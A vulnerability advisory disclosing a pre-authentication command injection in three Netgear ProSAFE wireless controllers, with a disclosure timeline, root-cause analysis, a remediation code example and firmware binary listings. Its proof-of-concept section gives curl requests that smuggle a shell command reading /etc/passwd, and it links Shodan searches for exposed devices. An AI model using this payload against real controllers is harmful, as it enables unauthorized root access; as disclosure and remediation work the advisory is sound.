################################################################################
METADATA DETAILS

Title: ACSA-2015-002

Timeline:
16 Oct 2015 - [Researcher] discovery
02 Dec 2015 - [Researcher] sends vendor notification at security@netgear.com, public disclosure set for 28 Dec 2015
08 Dec 2015 - [Researcher] sends vendor notification at security@netgear.com with all the details and PoC, public disclosure set for 28 Dec 2015
16 Dec 2015 - [Vendor] replies requesting "a standard 90-days grace period before public disclosure" and to fill in "NETGEAR Product Vulnerability Reporting Submission Form.xlsx"
17 Dec 2015 - [Researcher] replies with the filled-in "ACSA-2015-002 - NETGEAR Product Vulnerability Reporting Submission Form.xlsx", agrees to the 90-days grace period, asks the vendor to create CVE numbers and to notify/acknowledge the researcher
12 Jan 2016 - [Researcher] follows up with the vendor on the status and CVE numbers
12 Jan 2016 - [Vendor] notifies the researcher that its team is unable to reproduce this vulnerability and that "NETGEAR's Wireless Controller dev team would like to request a conference call with you and the technical team lead to discuss the findings which they are not able to reproduce"
04 Mar 2016 - [Researcher] sends a screencast to the vendor on how to reproduce the vulnerability, reminds about the 90-days grace period and the public disclosure on 31 Mar 2016
17 Mar 2016 - Expiry of the 90-days grace period
31 Mar 2016 - [Researcher] proceeds to public disclosure

Author: Andrei Costin, "FIRMWARE.RE" project
andrei@firmware.re
Vulnerability discovered using the "FIRMWARE.RE" platform/service

0. Vulnerability:
Pre-auth Remote Command Execution/Injection (RCE/RCI) in the web interface can allow attackers to effectively gain root (webserver user) access on the device.

1. Vulnerable products:
Netgear ProSAFE WC9500
Netgear ProSafe WC7600
Netgear ProSafe WC7520

*** Netgear ProSAFE WC9500 High Capacity Wireless Controller ~ 4000-5000 USD
The ProSAFE WC9500 High Capacity Wireless Controller is a scalable, high performance WLAN solution for centralized management of up to 200 ProSAFE wireless access points in a single wireless controller. Three WC9500 Wireless Controllers can stack into a single cluster to support up to 600 Access Points, with a fourth WC9500 acting as a redundant backup. The supported APs extend from entry level single band WNAP210/WNAP320/WN370 APs to dual band business class WNDAP360/350, premium grade 3x3 WNDAP660/620, and outdoor WND930 APs; the controller is also 802.11ac ready. The WC9500 Wireless Controller is easy to configure with an intuitive user interface and setup wizard, comprehensive dashboard and monitoring statistics. Flexible enough to support a few dozen laptops to several thousand tablets, it delivers enterprise grade functionality for mid to large-sized organizations, but without the cost and complexity of big IT. The WC9500 comes fully equipped with enterprise grade features such as comprehensive wireless security (WPA, WPA2, Radius, LDAP, Rogue AP protection), guest access, and full networking functionality including an embedded DHCP server, VLAN support on wired and wireless networks, and full Quality of Service differentiation. Additionally, with no recurring annual license fees: simply pay as you grow.

*** Netgear ProSafe WC7600 Wireless LAN Controller ~ 2000-3000 USD
The NETGEAR ProSAFE WC7600 Premium Wireless Controller is a fully featured enterprise class, high performance and secured wireless controller capable of managing up to 150 Access Points and 6,000 concurrent clients per cluster. The WC7600 delivers ultra-fast Access Point discovery, Layer 2 and Layer 3 fast roaming, multiple 10 Gigabit connectivity, a captive portal for guest access, fully distributed architecture, and ease of configuration and management. The NETGEAR ProSAFE WC7600 Premium Wireless Controller manages the full line of NETGEAR ProSAFE Access Points, from entry level single band APs (WNAP210 and WNAP320), business class dual band APs (WNDAP350 and WNDAP360), high performance 3x3:450Mbps per radio dual band selectable and concurrent APs (WNDAP620 and WNDAP660), to specialized in-wall mounted APs (WN370), all with a single click of a mouse. Unlike other wireless systems that are costly, complex and cumbersome to deploy, the WC7600 wireless controller is ideal for K-12 education, hospitality, and healthcare deployments. Designed with simplicity in mind for management and ease of use, it offers enterprise grade functionality and capability for small to mid-sized organizations, without the cost and complexity of big IT.

*** Netgear ProSafe WC7520 20-AP Wireless Controller ~ 1000-1700 USD
The NETGEAR ProSafe 20-AP Wireless Controller WC7520 offers a high-performance and fully-featured Wireless LAN architecture to meet the demands of medium-sized businesses, schools, and hospitals with thousands of users. Focusing on ease-of-use, the WC7520 Controller simplifies wireless deployments and network management with best-in-class wireless reliability, coverage, and performance. The scalable WC7520 Controller enables businesses to grow their wireless network as needed with a dramatic return on investment, with optional licenses that support their changing needs. Via licensing upgrades, the ProSafe Wireless Controller scales up to 50 access points (AP). For larger deployments, the WC7520 Controller is stackable up to three units, supporting up to 150 APs, including controller redundancy. Meeting the next generation needs of larger installations, the WC7520 Controller delivers central wireless management, integrated wireless mobility, robust top-end security and rich converged services such as L2/L3 fast roaming, guest access captive portal and Voice over Wi-Fi support. Built to last, the WC7520 Controller is backed by a Lifetime Warranty and delivers enterprise-class connectivity and secure wireless LAN functionality.
***

1.1 Is it for Home / Business / Service Provider, is it a Router, Wifi, Camera, Storage, etc?
Business / Enterprise / Service Provider

1.2 Vulnerable firmware:
The latest firmware of each product (as of 16 Oct 2015) was tested to be vulnerable.

2. What are the requirements to attack the affected products?
- Being able to ping the affected device and open its web interface (192.168.1.1 or 192.168.1.254)
- Being connected to the Ethernet or WiFi medium of the product, i.e.:
  - if the WiFi requires WLAN authentication, the attacker must first WLAN-authenticate;
  - if the WiFi is open or the Ethernet LAN is accessible, then there are no other requirements than being able to access the device web interface (192.168.0.1 or 192.168.1.254)

2.1 WWW/WAN interfaces - does it mean that any device of this sort one can find using Shodan on the Internet can be attacked?
Yes.
https://www.shodan.io/search?query=WC7520
https://www.shodan.io/search?query=WC7600
https://www.shodan.io/search?query=WC9500

2.2 Any particular configuration required?
No.

2.3 Is the default (factory reset) version of the product affected?
Unknown, but most likely yes.

2.4 Is there a configuration change that can make the product unaffected? (turning off UPnP for example?)
No.

3. Regarding the "Pre Auth OS Command Injection", what are the requirements for this one?
- Being able to ping the affected device and open its web interface (192.168.1.1 or 192.168.1.254)

3.1 What commands can be injected?
Any. See below for a full list of commands/executables present on the affected systems.
3.2 Can parameters to this command be provided?
Yes.

3.3 Are there any restrictions on the command line "characters", for example can one only provide alphanumeric characters?
No restrictions as far as tested and analyzed.

################################################################################
TECHNICAL DETAILS

The affected systems perform the login of web interface users using the "login_handler.php" module. The "login_handler.php" module calls the "doLogin()" function within "/include/scripts/login_menu.js". The doLogin() function is a simple AJAX call wrapper, as follows:

    function doLogin() {
        new ajaxRequest().sendRequest("auth_user", $H($("login_form").serialize(true)).toJSON(), handleLoginResp);
        return false;
    }

The AJAX requests reach the "do_login" function in the "common.php" module, which is where the root cause of the vulnerability lies. The start of the "do_login" function in the "common.php" module looks as follows:

    function do_login() {
        /*Assignment operation happening instead of conditional check which is not valid.
         * Moreover i don't know why this if statment is written here even before a value is assigned to $user_type
         * variable. Currently removing this statment have solved the issue of mutliplea admin user login.
         */
        /*if($user_type = validate_session_info(true)) {
            return 0;
        }*/
        $retval = 0;
        $session_file_name = "/tmp/session_".$_SERVER["SERVER_ADDR"].".bin";
        $url_enc_str = rawurlencode(stripslashes($_POST["jsonData"]));
        system("/wnc/bin/json_cli \"".($_POST["reqMethod"]=="session_force_auth_user"?"force_auth_user":$_POST["reqMethod"])."\" \"".$url_enc_str."\"", $retval);
        //Error code 253 (Not supported method) and 254 (Invalid format) are returned from json cli, if the arguments are incorrect
        if($retval == 0 || $retval == 253 || $retval == 254) {
            return 1;
        }

We can see there is a "system()" PHP call to "/wnc/bin/json_cli" where the command line is created by simple unsanitized concatenation.
In particular, the ternary operator

    ($_POST["reqMethod"]=="session_force_auth_user"?"force_auth_user":$_POST["reqMethod"])

in the command line concatenation is where the attack occurs. The attacker controls the POST request. By supplying a POST input called "reqMethod" that is not equal to "session_force_auth_user" AND which contains the command to be injected, the attacker-controlled command will be concatenated into the system call by the second branch of the ternary operator, i.e., :$_POST["reqMethod"]. Note that "reqMethod" is the only one of the two POST inputs that reaches the shell unencoded: "jsonData" is passed through rawurlencode(), "reqMethod" is not.

################################################################################
POC DETAILS

The PoC to trigger command execution is as follows, where the command to be injected is 'cat /etc/passwd':

    curl --data 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; cat "/etc/passwd' http://wc9500/login_handler.php
    curl --data 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; cat "/etc/passwd' http://wc7600/login_handler.php
    curl --data 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; cat "/etc/passwd' http://wc7520/login_handler.php

################################################################################
QUICK FIX

Sanitize parameters passed to the "system("/wnc/bin/json_cli...")" call.
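One way to apply this fix in PHP, as an added example that is not the vendor's code: the "reqMethod" value is checked against an allowlist of known json_cli methods, both arguments are passed through escapeshellarg() before system() is called, and rejected requests are written to the web server error log so attempts are visible to defenders. The allowlist contents and the function names build_json_cli_cmd() and do_login_hardened() are assumptions; only "auth_user" and "force_auth_user" are named in this advisory.

```php
<?php
// Added example, not the vendor's code: a hardened replacement for the
// command-building step of do_login(). Two independent controls:
//  1. reqMethod must match a fixed allowlist of known json_cli methods,
//     so arbitrary strings never reach the shell at all;
//  2. every argument still goes through escapeshellarg(), which single-quotes
//     it and escapes embedded quotes, so a quote inside the value cannot end
//     the argument the way the double-quote concatenation in the original lets it.
// The allowlist contents are an assumption: only "auth_user" and
// "force_auth_user" are named in the advisory.

const JSON_CLI = '/wnc/bin/json_cli';
const ALLOWED_REQ_METHODS = ['auth_user', 'force_auth_user'];

// Returns the fully quoted command line, or null when reqMethod is not a
// known method (the caller must then refuse the request).
function build_json_cli_cmd(array $post): ?string
{
    $method = $post['reqMethod'] ?? '';
    // Keep the original aliasing, applied before the allowlist check.
    if ($method === 'session_force_auth_user') {
        $method = 'force_auth_user';
    }
    if (!in_array($method, ALLOWED_REQ_METHODS, true)) {
        return null;
    }
    $json = rawurlencode(stripslashes($post['jsonData'] ?? ''));
    return JSON_CLI . ' ' . escapeshellarg($method) . ' ' . escapeshellarg($json);
}

// Drop-in for the vulnerable prologue of do_login(); same return
// convention as the original (1 = continue login processing, 0 = rejected).
function do_login_hardened(array $post): int
{
    $cmd = build_json_cli_cmd($post);
    if ($cmd === null) {
        error_log('login_handler: rejected unknown reqMethod ' . json_encode($post['reqMethod'] ?? null));
        return 0;
    }
    $retval = 0;
    system($cmd, $retval);
    // 253 (not supported method) and 254 (invalid format) come from json_cli itself.
    return ($retval == 0 || $retval == 253 || $retval == 254) ? 1 : 0;
}

// Constructed inputs: the advisory's PoC shape, and a legitimate login request.
$poc = ['reqMethod' => 'json_cli_reqMethod" "json_cli_jsonData"; cat "/etc/passwd', 'jsonData' => '{}'];
$ok  = ['reqMethod' => 'auth_user', 'jsonData' => '{"user":"admin"}'];
var_dump(build_json_cli_cmd($poc));  // refused by the allowlist before any shell call
var_dump(build_json_cli_cmd($ok));   // both arguments single-quoted by escapeshellarg()
```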
################################################################################
SOFTWARE ENVIRONMENT DETAILS

WC9500
Latest FW version: 5.1.0.17
Kernel-space: Linux "2.6.35.6 SMP mod_unload x86-64 64BIT LSB"
User-space: BusyBox v1.2.1 (2015.09.18-07:36+0000) multi-call binary

/bin
addgroup cat dd domainname grep login mknod nice ps sed ssh stty tracepath6 usleep adduser chgrp delgroup echo gunzip ls mktemp nisdomainname pwd setpci ssh-add su traceroute6 vi arping chmod deluser egrep gzip lsmod more pidof rm sftp ssh-agent sync true watch ash chown df false hostname lspci mount ping rmdir sh ssh-keygen tar umount wncinit busybox cp dmesg fgrep kill microperl mv ping6 run-parts sleep ssh-keyscan touch uname ypdomainname date dnsdomainname getopt ln mkdir netstat pipe_progress scp slogin stat tracepath uncompress zcat

/sbin
arp fdisk fsck.ext3 hdparm ifstat klogd mke2fs modinfo pivot_root reboot routel rtstat swapon tc ctstat freeramdisk genl hwclock init lnstat mkfs.ext2 modprobe plipconfig rmmod rtacct slattach start-stop-daemon switch_root udhcpc depmod fsck getty ifcfg insmod logread mkfs.ext3 nameif poweroff route rtmon ss sulogin sysctl vconfig e2fsck fsck.ext2 halt ifconfig ip losetup mkswap nstat rc routef rtpr sshd swapoff syslogd

/usr/bin
[ awk cal cmp deallocvt dumpleases fold fuser id less mkfifo nslookup patch reset sort tee time tty wc whoami [[ basename chvt cpu-load diff env free head install logger nc od printf rx strace telnet top uniq wget xargs ar bunzip2 cksum crontab dirname expr ftpget hexdump iozone md5sum net-load openvt readlink seq strings test tr unzip which yes arping bzcat clear cut du find ftpput hostid killall mesg nohup passwd renice sha1sum tail tftp traceroute uptime who

/usr/sbin
brctl chroot crond ethtool httpd inetd mii-tool tcpdump telnetd udhcpd

################################################################################
WC7600
Latest FW version: 5.1.0.17
Kernel-space: Linux "2.6.35.6 SMP mod_unload x86-64 64BIT LSB"
User-space: BusyBox v1.2.1 (2015.09.21-05:54+0000) multi-call binary

/bin
addgroup cat dd domainname grep login mknod nice ps sed ssh stty tracepath6 usleep adduser chgrp delgroup echo gunzip ls mktemp nisdomainname pwd setpci ssh-add su traceroute6 vi arping chmod deluser egrep gzip lsmod more pidof rm sftp ssh-agent sync true watch ash chown df false hostname lspci mount ping rmdir sh ssh-keygen tar umount wncinit busybox cp dmesg fgrep kill microperl mv ping6 run-parts sleep ssh-keyscan touch uname ypdomainname date dnsdomainname getopt ln mkdir netstat pipe_progress scp slogin stat tracepath uncompress zcat

/sbin
arp fdisk fsck.ext3 hdparm ifstat klogd mke2fs modinfo pivot_root reboot routel rtstat swapon tc ctstat freeramdisk genl hwclock init lnstat mkfs.ext2 modprobe plipconfig rmmod rtacct slattach start-stop-daemon switch_root udhcpc depmod fsck getty ifcfg insmod logread mkfs.ext3 nameif poweroff route rtmon ss sulogin sysctl vconfig e2fsck fsck.ext2 halt ifconfig ip losetup mkswap nstat rc routef rtpr sshd swapoff syslogd

/usr/bin
[ awk cal cmp deallocvt dumpleases fold fuser id less mkfifo nslookup patch reset sort tee time tty wc whoami [[ basename chvt cpu-load diff env free head install logger nc od printf rx strace telnet top uniq wget xargs ar bunzip2 cksum crontab dirname expr ftpget hexdump iozone md5sum net-load openvt readlink seq strings test tr unzip which yes arping bzcat clear cut du find ftpput hostid killall mesg nohup passwd renice sha1sum tail tftp traceroute uptime who

/usr/sbin
brctl chroot crond ethtool httpd inetd mii-tool tcpdump telnetd udhcpd

################################################################################
WC7520
Latest FW version: 2.5.0.35
Kernel-space: Linux "2.6.27.7-Cavium-Octeon SMP mod_unload OCTEON 64BIT MIPS64 rel2 version 1 LSB"
User-space: BusyBox v1.2.1 (2015.04.22-12:18+0000) multi-call binary

/bin
addgroup cat dd domainname grep login mknod nice pipe_progress scp slogin stat tracepath uncompress zcat adduser chgrp delgroup echo gunzip ls mktemp nisdomainname ps sed ssh stty tracepath6 usleep arping chmod deluser egrep gzip lsmod more opentftpd pwd setpci ssh-add su traceroute6 vi ash chown df false hostname lspci mount pidof rm sftp ssh-agent sync true watch busybox cp dmesg fgrep kill microperl mv ping rmdir sh ssh-keygen tar umount wncinit busybox date dnsdomainname getopt ln mkdir netstat ping6 run-parts sleep ssh-keyscan touch uname ypdomainname

/sbin
arp fdisk fsck.ext2 halt ifconfig klogd mke2fs mkswap nameif poweroff rmmod sshd sulogin switch_root udhcpc depmod freeramdisk fsck.ext3 hdparm init logread mkfs.ext2 modinfo pivot_root rc route swapoff sysctl vconfig e2fsck fsck getty hwclock insmod losetup mkfs.ext3 modprobe plipconfig reboot slattach start-stop-daemon swapon syslogd

/usr/bin
[ cal deallocvt expr fold install lockstat-test nandwrite oct-linux-jtg readlink strings top wget [[ chvt diff find free iozone logger nc oct-linux-mdio renice sumtool tr which ar cksum dirname flashcp ftl_check jffs2dump md5sum net-load od reset tail traceroute who arping clear docfdisk flash_erase ftl_format gdbserver killall mesg nftldump oncpu rx tee tty whoami awk cmp doc_loadbios flash_eraseall ftpget head ldd mkfifo nftl_format openvt seq telnet uniq xargs basename cpu-load du flash_info ftpput hexdump less mkfs.jffs2 nohup passwd sha1sum test unzip yes bunzip2 crontab dumpleases flash_lock fuser hostid locale mtd_debug nslookup patch sort tftp uptime bzcat cut env flash_unlock gdb id localedef nanddump oct-linux-identify printf strace time wc

/usr/sbin
brctl chroot crond ctstat ethtool httpd ifcfg ifstat inetd ip lnstat mii-tool nstat routef routel rtacct rtmon rtpr rtstat ss tc tcpdump telnetd udhcpd

################################################################################
About the author/project:

Firmware.RE is part of the Firmware Genome Project.
Firmware.RE is a free online service that:
- unpacks, scans and analyzes almost any firmware package and facilitates the quick detection of vulnerabilities, backdoors and all kinds of embedded malware.
- facilitates firmware mounting, modification, loading and emulation.
- facilitates firmware vulnerability and backdoor discovery.
- helps secure your embedded and internet-of-things devices.